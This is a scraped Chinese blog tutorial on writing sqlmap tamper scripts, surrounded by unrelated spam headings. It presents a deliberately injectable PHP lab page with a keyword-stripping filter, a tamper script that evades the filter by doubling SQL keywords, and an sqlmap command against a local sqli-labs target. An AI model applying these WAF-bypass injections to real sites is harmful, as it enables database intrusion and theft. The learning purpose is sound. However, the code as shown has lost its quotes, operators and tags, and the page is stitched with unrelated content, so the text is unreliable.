当前位置: 首页 > news >正文

西安做网站公司魔盒现在学什么技术最吃香工资高

西安做网站公司魔盒,现在学什么技术最吃香工资高,兰州网站推广公司,百度网盘网页版入口官网跟着师傅的文章进行学习 sqlmap之tamper脚本编写_sqlmap tamper编写-CSDN博客 这里学习一下tamper的编写 这里的tamper 其实就是多个绕过waf的插件 通过编写tamper 我们可以学会 在不同过滤下 执行sql注入 我们首先了解一下 tamper的结构 这里我们首先看一个最简单的例子…跟着师傅的文章进行学习 sqlmap之tamper脚本编写_sqlmap tamper编写-CSDN博客 这里学习一下tamper的编写 这里的tamper 其实就是多个绕过waf的插件 通过编写tamper 我们可以学会 在不同过滤下 执行sql注入 我们首先了解一下 tamper的结构 这里我们首先看一个最简单的例子 from lib.core.enums import PRIORITY__priority__ PRIORITY.LOWESTdef dependencies():pass def tamper(payload,**kwargs):return payload.replace(,\\).replace(,\\) 这里的例子我们可以发现 我们可以通过设置   __priority__: 当多个tamper被使用时的优先级LOWEST、LOWER、LOW、NORMAL、HIGH、HIGHER、HIGHESTtamper 对payload的处理 这里是将 双引号 单引号都加上 \\ 我们来根据题目进行测试吧 function sqlwaf( $str ) {$str str_ireplace( and, , $str );$str str_ireplace( or, , $str );$str str_ireplace( union, , $str );$str str_ireplace( select, , $str );$str str_ireplace( sleep, , $str );$str str_ireplace( group, , $str );$str str_ireplace( extractvalue, , $str );$str str_ireplace( updatexml, , $str );$str str_ireplace( PROCEDURE, , $str );return $str; } 增加过滤 将这些替换为空 这里其实我们本身已经知道如何注入了 双写绕过即可 ?php echo h1参数是 id 方式是GET/h1; $dbhost 172.18.224.108; // mysql服务器主机地址 $dbuser root; // mysql用户名 $dbpass root; // mysql用户名密码 $conn mysqli_connect($dbhost, $dbuser, $dbpass); function sqlwaf( $str ) {$str str_ireplace( and, , $str );$str str_ireplace( or, , $str );$str str_ireplace( union, , $str );$str str_ireplace( select, , $str );$str str_ireplace( sleep, , $str );$str str_ireplace( group, , $str );$str str_ireplace( extractvalue, , $str );$str str_ireplace( updatexml, , $str );$str str_ireplace( PROCEDURE, , $str );return $str; } // 设置编码防止中文乱码 mysqli_query($conn , set names utf8); $a sqlwaf($_GET[id]); echo $d; if($a){$sql SELECT * FROM user where id $a; }mysqli_select_db( $conn, test ); $retval mysqli_query( $conn, $sql ); if(! $retval ) {die( mysqli_error($conn)); } echo h2SQL 注入测试/h2; echo table border1trtdID/tdtdNAME/tdtdPASSWD/td; while($row mysqli_fetch_array($retval, MYSQLI_NUM)) {echo trtd {$row[0]}/td .td{$row[1]} /td .td{$row[2]} /td ./tr; } echo /table; mysqli_close($conn); ? 但是我们如何在tamper中体现呢 我们首先进行正常注入看看是否成功 发现这里就注入失败了 无法实现注入 所以我们开始修改tamper from lib.core.enums import PRIORITY__priority__ PRIORITY.NORMALdef dependencies():pass def tamper(payload,**kwargs):return payload.replace(OR,oorr).replace(UNION,uniunionon).replace(SELECT,selselectect).replace(PROCEDURE, PROCEPROCEDUREURE).replace(SLEEP, slesleepep).replace(GROUP, grogroupup).replace(EXTRACTVALUE, extractvextractvaluealue).replace(UPDATEXML, updatupdatexmlexml) 就是很简单的对payload进行操作 将所有过滤的内容实现绕过即可 然后我们再次进行注入 py3 .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id1%27--tamperwaf1.py -v3 注入成功 这是最简单的 tamper 后续写就要按照题目来了
http://www.pierceye.com/news/865639/

相关文章:

  • 网站找谁做贵州网架公司
  • 做纸箱在什么网站找客户wordpress默认导航栏
  • wordpress采集自动伪原创福州360手机端seo
  • 工信部网站备案要求重庆网站公司设计
  • 宛城区建网站淘宝网页设计报告
  • 网站后台需求字节跳动员工人数2019
  • saas建站 cms科技感背景素材
  • 武进区城乡建设局网站在线员工后台网站建设
  • 关于网站开发人员的薪资易语言怎么做无限打开网站
  • 网站备案名称几个字企业网站定制案例
  • 新浪云服务器做网站重庆建设厅官方网站
  • 苏州市住房和城乡建设局官方网站郑州专业旅游网站建设
  • 网站免费正能量直接进入浏览器下载安装公开课网站建设
  • 个人做电影网站合法吗网页制作与网站建设完全学习手册下载
  • 椒江做网站wordpress的分类
  • 新手做网站应该注意什么重庆市建设工程造价信息网公众号
  • 网址输入奉化seo页面优化外包
  • 坪山商城网站建设哪家效益快教务管理系统是应用软件吗
  • 深圳网站搭建找谁怎么在手机上制作app
  • 做app和做网站的区别桂林市天气预报15天
  • 高端织梦html5网站模板 dedecms网络公司模板关键词排名优化方法
  • 上海网站建设咨找个网站2021能看到
  • 可以用服务器做网站查询公司信息
  • 个人可以备案企业网站吗旅行社网站 模板
  • 三丰云做网站步骤网站怎么上传ftp
  • 做二手车有哪些网站有哪些手续网站建设单位有哪些方面
  • 建设网站的和服务器常州免费网站制作
  • 电子外贸网站重庆有什么好玩的
  • 商务网站的建设阶段包括郑州的做网站公司哪家好
  • 深圳网站建设网络公司七星彩网投网站建设